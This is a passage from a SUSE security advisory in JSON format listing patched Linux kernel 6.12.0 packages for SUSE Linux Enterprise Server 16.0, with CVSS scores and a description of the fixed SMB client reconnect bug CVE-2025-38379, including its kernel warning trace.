{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-38298"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
